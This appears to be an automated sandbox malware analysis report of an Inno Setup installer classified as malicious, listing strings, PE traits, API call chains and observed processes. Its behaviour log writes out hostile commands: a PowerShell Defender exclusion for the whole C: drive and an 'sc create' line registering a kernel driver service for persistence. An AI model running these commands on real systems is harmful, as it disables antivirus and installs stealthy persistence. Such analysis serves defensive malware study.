Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0A
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0C
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0H
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0I
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://ocsp.digicert.com0X
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://www.digicert.com/CPS0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: yvaKqhmD4L.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F5FB000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000001.00000000.1677476688.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, yvaKqhmD4L.tmp, 00000006.00000000.1765909025.0000000000A5D000.00000020.00000001.01000000.00000008.sdmp, yvaKqhmD4L.tmp.0.dr, yvaKqhmD4L.tmp.5.drString found in binary or memory: https://www.innosetup.com/
Source: yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F5FB000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000001.00000000.1677476688.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, yvaKqhmD4L.tmp, 00000006.00000000.1765909025.0000000000A5D000.00000020.00000001.01000000.00000008.sdmp, yvaKqhmD4L.tmp.0.dr, yvaKqhmD4L.tmp.5.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
PE file contains section with special chars
Source: update.vbc.1.drStatic PE information: section name: .aQ#
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1F8810 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C1F8810
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C073886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073886
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1F9450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C1F9450
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C073C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073C62
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C073D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073D18
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C073D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073D62
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C0739CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C0739CF
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C073A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073A6A
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C071950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6C071950
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C074754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6C074754
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C0747546_2_6C074754
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C3D8D126_2_6C3D8D12
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C344F0A6_2_6C344F0A
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C3CB06F6_2_6C3CB06F
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1F48606_2_6C1F4860
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C3638816_2_6C363881
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1FA1336_2_6C1FA133
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C307A466_2_6C307A46
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C37CB306_2_6C37CB30
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C259CE06_2_6C259CE0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2A6D506_2_6C2A6D50
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C22BEA16_2_6C22BEA1
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2ACE806_2_6C2ACE80
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C245EC96_2_6C245EC9
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2A18106_2_6C2A1810
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2BD9306_2_6C2BD930
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C22B9726_2_6C22B972
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2AC9F06_2_6C2AC9F0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2A2A506_2_6C2A2A50
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2A4AA06_2_6C2A4AA0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2B7AA06_2_6C2B7AA0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2A0AD06_2_6C2A0AD0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C243B666_2_6C243B66
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C233BCA6_2_6C233BCA
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C24840A6_2_6C24840A
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2A55806_2_6C2A5580
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2B25C06_2_6C2B25C0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2AC6E06_2_6C2AC6E0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2CC7006_2_6C2CC700
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C22F7CF6_2_6C22F7CF
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2A30206_2_6C2A3020
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C2B67506_2_6C2B6750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D381EC10_2_00D381EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D0E00A10_2_00D0E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D781C010_2_00D781C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D722E010_2_00D722E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8824010_2_00D88240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8C3C010_2_00D8C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D9230010_2_00D92300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D804C810_2_00D804C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D5E49F10_2_00D5E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D725F010_2_00D725F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D666D010_2_00D666D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6A6A010_2_00D6A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6865010_2_00D68650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8E99010_2_00D8E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6C95010_2_00D6C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D4094310_2_00D40943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D72A8010_2_00D72A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D4AB1110_2_00D4AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D76CE010_2_00D76CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D68C2010_2_00D68C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D84EA010_2_00D84EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D80E0010_2_00D80E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D7D08910_2_00D7D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D510AC10_2_00D510AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6D1D010_2_00D6D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D891C010_2_00D891C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D7518010_2_00D75180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6B18010_2_00D6B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D5B12110_2_00D5B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8112010_2_00D81120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8D2C010_2_00D8D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8720010_2_00D87200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF53CF10_2_00CF53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8F3C010_2_00D8F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D553F310_2_00D553F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1B3E410_2_00D1B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D7F3A010_2_00D7F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D854D010_2_00D854D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D3D49610_2_00D3D496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8D47010_2_00D8D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6741010_2_00D67410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D7F42010_2_00D7F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8F59910_2_00D8F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8155010_2_00D81550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF157210_2_00CF1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D9351A10_2_00D9351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6F50010_2_00D6F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8353010_2_00D83530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D7D6A010_2_00D7D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D4965210_2_00D49652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D9360110_2_00D93601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF97CA10_2_00CF97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D877C010_2_00D877C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D0976610_2_00D09766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D1F8E010_2_00D1F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D8D9E010_2_00D8D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6F91010_2_00D6F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D0BAC910_2_00D0BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D77AF010_2_00D77AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D43AEF10_2_00D43AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF1AA110_2_00CF1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D0BC9210_2_00D0BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D77C5010_2_00D77C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D6FDF010_2_00D6FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D75E8010_2_00D75E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D75F8010_2_00D75F80
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: String function: 6C2C9F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: String function: 6C22C240 appears 31 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00D8FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00CF1E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00CF28E3 appears 34 times
Source: yvaKqhmD4L.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: yvaKqhmD4L.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: yvaKqhmD4L.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: yvaKqhmD4L.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: yvaKqhmD4L.exeStatic PE information: Number of sections : 11 > 10
Source: yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F8FA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName5LHPnoUW1r.exe vs yvaKqhmD4L.exe
Source: yvaKqhmD4L.exe, 00000000.00000000.1674102222.0000000000189000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName5LHPnoUW1r.exe vs yvaKqhmD4L.exe
Source: yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002E0E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName5LHPnoUW1r.exe vs yvaKqhmD4L.exe
Source: yvaKqhmD4L.exeBinary or memory string: OriginalFileName5LHPnoUW1r.exe vs yvaKqhmD4L.exe
Source: yvaKqhmD4L.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal96.evad.winEXE@128/31@0/0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1F9450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C1F9450
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00CF9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D03D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00D03D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00CF9252
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1F8930 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW,6_2_6C1F8930
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Program Files (x86)\Windows NT\is-LQQ5K.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:980:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5500:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3336:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6572:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeFile created: C:\Users\user\AppData\Local\Temp\is-C99HC.tmpJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: yvaKqhmD4L.exeVirustotal: Detection: 11%
Source: yvaKqhmD4L.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeFile read: C:\Users\user\Desktop\yvaKqhmD4L.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\yvaKqhmD4L.exe "C:\Users\user\Desktop\yvaKqhmD4L.exe"
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe"
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess created: C:\Users\user\Desktop\yvaKqhmD4L.exe "C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp "C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp" /SL5="$A022E,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
